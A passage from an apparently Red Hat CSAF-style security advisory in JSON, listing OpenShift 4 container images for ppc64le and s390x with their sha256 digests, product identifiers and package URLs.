"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3Afc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3A50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3Af5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3Aa7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Ab36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3Ad48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9-operator@sha256%3A93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601995"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-cloud-controller-manager-rhel9@sha256%3Aec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-machine-controllers-rhel9@sha256%3Acc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562680"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3Afc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Ad3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3Ac8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3A5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3Aceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Ae5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3Ac17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Af66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Abd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3Aacebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3A3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3Af677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3Ae233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3Ae44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3A46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"product_identification_helper": {
